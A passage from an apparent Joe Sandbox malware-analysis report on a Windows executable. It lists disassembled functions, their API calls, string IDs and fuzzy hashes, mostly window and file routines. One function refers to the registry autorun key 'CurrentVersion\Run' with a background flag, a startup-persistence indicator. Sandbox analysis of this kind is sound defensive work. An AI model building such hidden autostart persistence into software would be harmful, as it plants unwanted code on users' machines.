                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ModuleValue$FileHandleNameOpenQuerylstrlen
                                                                                                      • String ID: " -bg$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                                                                                      • API String ID: 3684264954-3110968143
                                                                                                      • Opcode ID: ace6604d25413a570536e2212c6cf900fe193ef87058378d3ccfffda96ba3332
                                                                                                      • Instruction ID: c29cf95cee922bc5516625886b548d78ba82a48099b151cd577d435e0fbe8af1
                                                                                                      • Opcode Fuzzy Hash: ace6604d25413a570536e2212c6cf900fe193ef87058378d3ccfffda96ba3332
                                                                                                      • Instruction Fuzzy Hash: AA3164B294011CABDF20DBA5DD89EDFB7BCEF48310F0045A6B509E2151DA749B85CF64
                                                                                                      Function 00428006 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 71COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: RectWindow$CopyH_prologPlacement
                                                                                                      • String ID: %d;%d;%d;%d;%d;x,y,w,h,SW$4AD
                                                                                                      • API String ID: 2334692988-2850367280
                                                                                                      • Opcode ID: 0646806f5e91b62a44fd3893da5d20815bbe50d8f5b46a4a1664904fce4db92a
                                                                                                      • Instruction ID: fe6b21715060f9ee3ad9911a439f44bc9ffd1e215c6b3483b9d16e6980fe2404
                                                                                                      • Opcode Fuzzy Hash: 0646806f5e91b62a44fd3893da5d20815bbe50d8f5b46a4a1664904fce4db92a
                                                                                                      • Instruction Fuzzy Hash: F321E572D00119AACF11DFD4DC85EEEBBB9FF48305F00442AE901B6151D779AA19CB64
                                                                                                      Function 0043622C Relevance: 10.6, APIs: 7, Instructions: 61windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • CallWindowProcW.USER32(?,00000014,?,?), ref: 0043624A
                                                                                                      • GetParent.USER32(?), ref: 0043625E
                                                                                                      • GetParent.USER32(00000000), ref: 00436261
                                                                                                      • MapWindowPoints.USER32(?,00000000,?,00000001), ref: 0043627D
                                                                                                      • OffsetWindowOrgEx.GDI32(?,?,?,?), ref: 00436296
                                                                                                      • SendMessageW.USER32(00000000,00000014,?,00000000), ref: 0043629F
                                                                                                      • OffsetWindowOrgEx.GDI32(?,?,?,?), ref: 004362BA
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$OffsetParent$CallMessagePointsProcSend
                                                                                                      • String ID:
                                                                                                      • API String ID: 593092700-0
                                                                                                      • Opcode ID: 626aed2c86cc15b35851dd1dd7cd3fbf682c3f01cfdcc080fc99eecc66589346
                                                                                                      • Instruction ID: 1b369d1bca0969bd8b2634237acd7de0d378513594854ca44be8d192bcae6432
                                                                                                      • Opcode Fuzzy Hash: 626aed2c86cc15b35851dd1dd7cd3fbf682c3f01cfdcc080fc99eecc66589346
                                                                                                      • Instruction Fuzzy Hash: 6D11A77690025DBFDF119F95DC84CEEBFBEFB48350F018466FA15A2160C6719A10AF64
                                                                                                      Function 004343D1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57sleepwindowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 004343D6
                                                                                                      • Sleep.KERNEL32(000000C8,?,00480744,00000000,?,?,00433C62,?,00000001,?,00000000,CopyHtmlCode2TxtPaste,?,00000000,ClTxt2Key,?), ref: 004343F1
                                                                                                      • MessageBoxW.USER32(00000000,?,00000000,00000000), ref: 00434410
                                                                                                      • Sleep.KERNEL32(000000C8,?,00480744,00000000,?,?,00433C62,?,00000001,?,00000000,CopyHtmlCode2TxtPaste,?,00000000,ClTxt2Key,?), ref: 00434417
                                                                                                      • Sleep.KERNEL32(000000C8,?,00480744,00000000,?,?,00433C62,?,00000001,?,00000000,CopyHtmlCode2TxtPaste,?,00000000,ClTxt2Key,?), ref: 00434439
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Sleep$H_prologMessage
                                                                                                      • String ID: 4AD
                                                                                                      • API String ID: 1000836623-1156607891
                                                                                                      • Opcode ID: 80e3619b6cb91774ceead2760d8c799e560699f8c8997c7315fc327c3fc368a0
                                                                                                      • Instruction ID: c8e1e4ef96509cc1d34c4515fcb34c320b1d7d68d0546a26219d256975605823
                                                                                                      • Opcode Fuzzy Hash: 80e3619b6cb91774ceead2760d8c799e560699f8c8997c7315fc327c3fc368a0
                                                                                                      • Instruction Fuzzy Hash: A511A371800208AEEB00EBA5ED85EEEBB78EB04354F20412FF000B7191DB781E44DB28
                                                                                                      Function 00424245 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 47stringCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • lstrcpyW.KERNEL32(?), ref: 0042425B
                                                                                                      • lstrcatW.KERNEL32(?,00000000,\Backup), ref: 0042428F
                                                                                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 004242A6
                                                                                                      • lstrlenW.KERNEL32(?), ref: 004242BD
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CreateDirectorylstrcatlstrcpylstrlen
                                                                                                      • String ID: \Backup$hAB
                                                                                                      • API String ID: 291623610-2780332934
                                                                                                      • Opcode ID: 5e71e3676f548fc8eef8190d2d2d624d17cd50a9d1b8bb0228dab7a95658d322
                                                                                                      • Instruction ID: 5d9425836112100eaf2b6b8e5aeeddb2b8b346ef44fab14ca78b7b7aa9d58edc
                                                                                                      • Opcode Fuzzy Hash: 5e71e3676f548fc8eef8190d2d2d624d17cd50a9d1b8bb0228dab7a95658d322
                                                                                                      • Instruction Fuzzy Hash: 180156F59101099BDF10EBA1DD59F9A777CAB44304F0004E5A705F20D2DB749A458F5C
                                                                                                      Function 0042D41B Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • SetRect.USER32(0042BD45,00000000,00000000,00000000,?), ref: 0042D44B
                                                                                                      • SetWindowPos.USER32(?,00000000,00000002,00000003,00000000,00000000,00000015,?,?,0042BD45,?,00000000), ref: 0042D468
                                                                                                      • SetWindowPos.USER32(?,00000000,00000000,?,00000000,?,00000004,?,?,0042BD45,?,00000000), ref: 0042D483
                                                                                                      • SetRect.USER32(0042BD45,00000000,00000000,00000000,00000000), ref: 0042D49B
                                                                                                      • SetWindowPos.USER32(?,00000000,-000000E9,00000003,00000000,00000000,00000015,?,?,0042BD45,?,00000000), ref: 0042D4BD
                                                                                                      • InvalidateRect.USER32(00000000,0042BD45,00000001,?,?,0042BD45,?,00000000), ref: 0042D4E7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: RectWindow$Invalidate
                                                                                                      • String ID:
                                                                                                      • API String ID: 1056487977-0
                                                                                                      • Opcode ID: 5afb842bdec1a3cce351e7e9e9114239a5e0f35c927c0db12be784a85ca540a9
                                                                                                      • Instruction ID: 9a7c52b52044f0b9150fede3bba70a30080b0dbe8a6437ef3e0f636978d02bb5
                                                                                                      • Opcode Fuzzy Hash: 5afb842bdec1a3cce351e7e9e9114239a5e0f35c927c0db12be784a85ca540a9
                                                                                                      • Instruction Fuzzy Hash: 1F3143B2600618BFEB119FA4DCC4EBBB7ADEB48754F408529FA46E7650C670FD018B64
                                                                                                      Function 004362C5 Relevance: 9.1, APIs: 6, Instructions: 75windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetWindowLongW.USER32(00000000,000000FC), ref: 004362F0
                                                                                                      • SetWindowLongW.USER32(?,000000FC,0043622C), ref: 00436305
                                                                                                      • GetClientRect.USER32(?,00000000), ref: 0043631D
                                                                                                      • SendMessageW.USER32(?,00000418,00000000,00000000), ref: 0043634A
                                                                                                      • SendMessageW.USER32(?,0000041D,-00000001,?), ref: 0043635A
                                                                                                      • SetWindowPos.USER32(?,00000000,00420BC1,?,00420BC1,?,00000040,?,?,?,00420BC1,00000000,00000000), ref: 00436379
                                                                                                        • Part of subcall function 004360E5: CreateWindowExW.USER32(75A92370,ToolbarWindow32,00000000,00000000,00000000,00000000,000000B4,00000014,00000000,00000000,00000000,00000000), ref: 00436113
                                                                                                        • Part of subcall function 004360E5: GetStockObject.GDI32(00000011), ref: 00436127
                                                                                                        • Part of subcall function 004360E5: GetObjectW.GDI32(00000000,0000005C,?), ref: 00436145
                                                                                                        • Part of subcall function 004360E5: SystemParametersInfoW.USER32(00000029,000001F4,?,00000000), ref: 0043616E
                                                                                                        • Part of subcall function 004360E5: CreateFontIndirectW.GDI32(?), ref: 0043618A
                                                                                                        • Part of subcall function 004360E5: SendMessageW.USER32(00000000,00000030,?,00000000), ref: 004361A2
                                                                                                        • Part of subcall function 004360E5: SendMessageW.USER32(00000000,0000041E,00000014,00000000), ref: 004361AF
                                                                                                        • Part of subcall function 004360E5: SendMessageW.USER32(00000000,00000420,00000000,00100000), ref: 004361BF
                                                                                                        • Part of subcall function 004360E5: GetDlgItem.USER32(00000000,?), ref: 004361CC
                                                                                                        • Part of subcall function 004360E5: ShowWindow.USER32(00000000,00000000), ref: 004361E1
                                                                                                        • Part of subcall function 004360E5: GetWindowRect.USER32(00000000,00000000), ref: 004361EC
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$MessageSend$CreateLongObjectRect$ClientFontIndirectInfoItemParametersShowStockSystem
                                                                                                      • String ID:
                                                                                                      • API String ID: 3062793459-0
                                                                                                      • Opcode ID: cdd7510cf0f21a5f206af28a3c6f98eba230aeda3fa79f76c1b1993af790ee0a
                                                                                                      • Instruction ID: 6fa5585dfdfa755437bdcf99a996e14e6fb65e5566723ec97538393471b35915
                                                                                                      • Opcode Fuzzy Hash: cdd7510cf0f21a5f206af28a3c6f98eba230aeda3fa79f76c1b1993af790ee0a
                                                                                                      • Instruction Fuzzy Hash: 882162B2900619BFEB11AFA4DC85CBFBBB9FB08754F004529F612A11A0C772AD10CB54
                                                                                                      Function 00430273 Relevance: 9.1, APIs: 6, Instructions: 66windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 00430278
                                                                                                      • GetWindowDC.USER32(?,?,?,?,00000001), ref: 004302B5
                                                                                                        • Part of subcall function 004318E0: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,?), ref: 00431915
                                                                                                        • Part of subcall function 004318E0: CreatePatternBrush.GDI32(00000000), ref: 00431922
                                                                                                        • Part of subcall function 004318E0: DeleteObject.GDI32(00000000), ref: 0043192B
                                                                                                      • SelectObject.GDI32(?,?), ref: 004302DA
                                                                                                      • PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 004302FA
                                                                                                      • SelectObject.GDI32(?,00000000), ref: 00430304
                                                                                                      • DeleteObject.GDI32(?), ref: 00430307
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Object$CreateDeleteSelect$BitmapBrushH_prologPatternWindow
                                                                                                      • String ID:
                                                                                                      • API String ID: 3230913206-0
                                                                                                      • Opcode ID: b046a5a948507c895ee2dbf00b0d62e04aecc57e3d33800da9460c3475ea69b2
                                                                                                      • Instruction ID: c11674e792ad895603e7ae83b2f7238172a1f69c4ea2e823c6e8fab6d9ad6268
                                                                                                      • Opcode Fuzzy Hash: b046a5a948507c895ee2dbf00b0d62e04aecc57e3d33800da9460c3475ea69b2
                                                                                                      • Instruction Fuzzy Hash: 5F21E572D00219AFCB00EFE9CD869EEBBB9FB08350F04516AE515B3291D7399941CBA4
                                                                                                      Function 00422471 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 162COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • __EH_prolog.LIBCMT ref: 00422476
                                                                                                        • Part of subcall function 0042227A: __EH_prolog.LIBCMT ref: 0042227F
                                                                                                        • Part of subcall function 0042B324: __EH_prolog.LIBCMT ref: 0042B329
                                                                                                        • Part of subcall function 00421ECF: __EH_prolog.LIBCMT ref: 00421ED4
                                                                                                        • Part of subcall function 00421ECF: lstrlenW.KERNEL32(00000000,00001000,?,7591E0B0,?,00000000,?,?,0042787E,00000000,?,?,00000000,?,?,00000000), ref: 00421F07
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: H_prolog$lstrlen
                                                                                                      • String ID: 4AD$list_label$list_order$list_text
                                                                                                      • API String ID: 3243491680-935690056
                                                                                                      • Opcode ID: b471c8b23e0565e2d637fdec32c87e7a6f256946f192debd5a72f2da2909eee6
